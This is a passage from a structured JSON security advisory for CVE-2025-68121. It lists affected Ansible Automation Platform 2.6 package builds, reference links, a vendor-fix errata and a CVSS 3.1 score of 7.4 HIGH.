"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "RHBZ#2437111",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://go.dev/cl/737700",
"url": "https://go.dev/cl/737700"
},
{
"category": "external",
"summary": "https://go.dev/issue/77217",
"url": "https://go.dev/issue/77217"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk",
"url": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4337",
"url": "https://pkg.go.dev/vuln/GO-2026-4337"
}
],
"release_date": "2026-02-05T17:48:44.141000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T16:12:45+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6277"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
